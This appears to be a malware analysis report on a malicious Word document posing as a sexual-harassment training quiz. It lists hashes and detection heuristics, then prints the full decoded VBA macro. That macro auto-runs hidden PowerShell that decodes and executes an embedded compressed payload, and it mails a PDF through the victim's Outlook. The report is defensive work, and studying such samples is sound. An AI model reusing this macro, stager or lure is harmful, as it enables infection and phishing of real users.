Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 719be89a297907cf…

MALICIOUS

Office (OLE)

64.5 KB Created: 2017-12-12 21:58:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: c0eb9aca5e01d4cbc3ac83a285b10502 SHA-1: fcebfe860ce0165017455c76680849b7b5393249 SHA-256: 719be89a297907cf45633b0f605db02263a9b3db7585743e870aae2529188d3e
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open and OLE_VBA_AUTOEXEC_EXEC heuristics. This macro references PowerShell and uses the Shell() function, strongly suggesting it stages and executes a second-stage payload. Note that the visible VBA does not itself download anything: the PowerShell command line it builds decodes and decompresses a Base64/Deflate blob embedded in the macro and runs the result with Invoke-Expression, so any network retrieval would happen inside that decoded script, which is not shown in this report. The document body presents a fake training quiz to lure the user into enabling macros.

Heuristics 9

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (xt4)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    If Arch = "AMD64" Then
        fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
    Else
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set OutApp = CreateObject("Outlook.Application")
        Set OutMail = OutApp.CreateItem(0)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches macro documents that are p-code-only, or whose source extraction failed, so that no visible source is available.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Arch = Environ("PROCESSOR_ARCHITECTURE")
    windir = Environ("windir")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4060 bytes
SHA-256: 657fb53c9a6565b3c713805d12c38c7b3caf1c1ffaf2ecaf926e30cf2d3961d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
' Module header as decoded by olevba: this is the ThisDocument module of the
' Word file. The VB_Control attribute shows the document hosts an MSForms
' CommandButton named "Submit"; its Submit_Click handler further down drives
' the export-and-email part of the lure, while Document_Open carries the
' payload.
' Auto-executes when the document is opened (Word runs Document_Open on the
' ThisDocument module without further user interaction once macros are
' enabled). Everything below assembles a PowerShell command line and launches
' it with Shell(); nothing is returned and no error handling is present.
Private Sub Document_Open()

Dim fp2 As String   ' path of the PowerShell executable to launch
Dim fp1 As String   ' Base64-encoded, Deflate-compressed script body
Dim xt4 As String   ' full command line handed to Shell()

' Arch and windir are never declared (no Option Explicit is visible in this
' module), so they are implicit Variants filled from the environment.
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
' On 64-bit Windows the SysWOW64 path is chosen, i.e. the 32-bit PowerShell
' host; otherwise the bare name is left to PATH resolution. Defender note: a
' Word process spawning %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
' is a useful process-tree signal for this sample.
If Arch = "AMD64" Then
    fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    fp2 = "powershell.exe"
End If

' The payload is concatenated from short string fragments; splitting it this
' way presumably exists to defeat naive single-line string matching. The
' trailing "==" is Base64 padding, consistent with the FromBase64String call
' in the command line below. The decoded script is NOT shown in this report,
' so its behaviour (including any download) cannot be stated from this view.
fp1 = "nVRtc9pGEP7Or9jRXGekMZLFi90YjWfi4LihDY5riJ2WYTqHtKALpz"
fp1 = fp1 + "v5dMJgwn/vCquYfO0XnXa1t8+zu8+KPcElvHcak2spB1mujX"
fp1 = fp1 + "WdJRqFstMOEikdbwp5OZMihsJySweuLX2HgbJ31sCDMLbk8k"
fp1 = fp1 + "pKHbu1T+ZXSWKwKJpQCmUheR6JF6yN+WsspdJqvMnf3HdGW4"
fp1 = fp1 + "ytF/1vLn2D3OI4pSN54/JqX1lrxKy0eETK8nj5yuwQTD5jD+"
fp1 = fp1 + "wP7jtueIaEdbi8x6ISbiRfHEe+og0SKsN537Bms2UJddi5+t"
fp1 = fp1 + "C//njz26fB7398Ht5+ufvzfjT++vD47a+/+SxOcL5IxfelzJ"
fp1 = fp1 + "TOn0xhy9XzevMSttqd7tn5r+8unGCs+yk3V8bwjes15qWKK3"
fp1 = fp1 + "SIXbbytmDQltQH150Qu8l0Cmz18w34AUPkRWnQ/zL7Tm0Gf1"
fp1 = fp1 + "RmXkAP+AXCdSsMwccnuGh7u7fsFrZsXrF3olYQdH7MNRUXp7"
fp1 = fp1 + "7ep6BvJ5fAkom7QOsbrhKdgZ/xtcgoK0uCz6gWNvWmu6jmx+"
fp1 = fp1 + "bRUXaELeRGx9Rq2E54RXTK1gRHjxNg/+wiQJUQhTWxL0gNNS"
fp1 = fp1 + "5sXYXP/xn3e1wvUKQF19vtjgAWWyDG4DJxGUZMgC8tnHfp7e"
fp1 = fp1 + "TE27KUkGzElhVgQggYAdQF0hUJgvguKa6oAtKKkYxAzMGlnh"
fp1 = fp1 + "eeB4euUwTB1oZzsfr21aEyJ7dogxGalYjxTtNYhlzxBZppr1"
fp1 = fp1 + "d50fTRWDEXtAn4wKVI9nLqcylnJEvC3DJrStxFLCPjlgquBz"
fp1 = fp1 + "faFBazoEr/iLO+FKhs1GBZ8ImEh6YISL6uUxZofMJT1mmCM9"
fp1 = fp1 + "QvQkp+2g1C4q+znMBmkioejgYf4TxoRfAoqI/PBdyOPceLmC"
fp1 = fp1 + "LQRQSTDxuLe0HlVRuy4Fo/K6l5cs0td53U2rzonZ6etYOzs6"
fp1 = fp1 + "DdagXt9kWv2+2cMuWA12CabhEfv9p00gZmMzTXOBdK7CfEns"
fp1 = fp1 + "C/pc0Ch+A7bQd8RVaR8xhh77mpZ1mAn/OisKkpG2x9yXSv99"
fp1 = fp1 + "OfJ2yyvNZbM1x3wjCkoxt60aRu132prMgwoEVFo/N6MEUw5K"
fp1 = fp1 + "ZIuaSp9HW+cVnehLAJk9d9nrpsTXtERqftel4TDiBVaXTl+I"
fp1 = fp1 + "dDiE22blZHWO2bLq2vSkmi2f9U/JFEzGntMNak6nfn3TDc0f"
fp1 = fp1 + "DjdLv7Fw=="

' Command line: no profile (-NoP), non-interactive (-NonI), hidden window,
' execution policy bypassed. The -Command argument chains
' Convert::FromBase64String -> MemoryStream -> DeflateStream(Decompress) ->
' StreamReader(ASCII).ReadToEnd() and feeds the text to Invoke-Expression.
' In VBA a doubled "" inside a literal is one quote character; the \" pairs
' are the escaped quotes that reach PowerShell's command-line parser, so the
' whole Base64 blob ends up inside the child process's command line.
xt4 = fp2 + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
xt4 = xt4 + "and ""Invoke-Expression $(New-Object IO.StreamRea"
xt4 = xt4 + "der ($(New-Object IO.Compression.DeflateStream ("
xt4 = xt4 + "$(New-Object IO.MemoryStream (,$([Convert]::From"
xt4 = xt4 + "Base64String(\"" " & fp1 & " \"" )))), [IO.Compr"
xt4 = xt4 + "ession.CompressionMode]::Decompress)), [Text.Enc"
xt4 = xt4 + "oding]::ASCII)).ReadToEnd();"""

' Execution point flagged by OLE_VBA_SHELL. Because the blob travels on the
' command line, process-creation telemetry (command-line auditing) captures
' the complete second stage in encoded form.
Shell (xt4)


End Sub



' Emails the file at vPath as an attachment through the user's own Outlook
' profile via COM automation (the CreateObject call flagged by
' OLE_VBA_CREATEOBJ). Called from Submit_Click with the freshly exported PDF.
'   vPath - full path of the file to attach.
' No return value; every error inside the send block is silenced.
Sub Mail_Workbook_1(vPath As String)
    Dim OutApp As Object
    Dim OutMail As Object

    Set OutApp = CreateObject("Outlook.Application")
    Set OutMail = OutApp.CreateItem(0)   ' 0 = olMailItem

    ' Errors from here to "On Error GoTo 0" are swallowed, so the user still
    ' sees the "submitted successfully" box below even if Outlook declined
    ' to send (or no Outlook profile exists).
    On Error Resume Next

    With OutMail
        ' Hard-coded recipient. Whether this address belongs to the
        ' impersonated organisation cannot be determined from this report;
        ' treat it as an indicator to verify. The sent item in the victim's
        ' Outlook profile is a host-side artifact worth collecting.
        .To = "hr.training@vystar.training"
        .CC = ""
        .BCC = ""
        .Subject = "VyStar Sexual Harassment & Diversity Training"
        .Body = "I have completed the sexual harassment & diversity training!"
        .Attachments.Add vPath
        .Send
    End With
    On Error GoTo 0

    Set OutMail = Nothing
    Set OutApp = Nothing
' Decoy confirmation that completes the fake "training quiz" experience.
MsgBox "Your training has been submitted successfully!", vbOKOnly, "Thank you"

End Sub


' Click handler for the "Submit" CommandButton declared in the module header.
' Exports the open document to a PDF beside it, mails that PDF through
' Mail_Workbook_1, then deletes it. This is the benign-looking half of the
' lure; the PowerShell payload has already run from Document_Open by the
' time the user can press this button.
Private Sub Submit_Click()
    Dim vDoc As Object   ' declared but never used
    
    Dim vPath As String
    
    ' Temporary PDF written into the same directory as the document; the
    ' fixed file name is a useful file-creation indicator.
    vPath = ActiveDocument.Path & Application.PathSeparator & "VyStar_SHD_Training.pdf"
    ' Whole document (Range:=wdExportAllDocument) exported with markup and
    ' structure tags; KeepIRM:=True preserves any rights management on the
    ' output, OpenAfterExport:=False keeps the export silent.
    ActiveDocument.ExportAsFixedFormat OutputFileName:=vPath, _
        ExportFormat:=wdExportFormatPDF, OpenAfterExport:=False, OptimizeFor:= _
        wdExportOptimizeForPrint, Range:=wdExportAllDocument, From:=1, To:=1, _
        Item:=wdExportDocumentWithMarkup, IncludeDocProps:=False, KeepIRM:=True, _
        CreateBookmarks:=wdExportCreateNoBookmarks, DocStructureTags:=True, _
        BitmapMissingFonts:=True, UseISO19005_1:=False
    
    Call Mail_Workbook_1(vPath)
    
    ' Removes the exported PDF. If this line runs, the file name above and
    ' the Outlook sent item are the remaining on-host traces of this step;
    ' there is no error handling, so a failed Kill raises a runtime error.
    Kill vPath
End Sub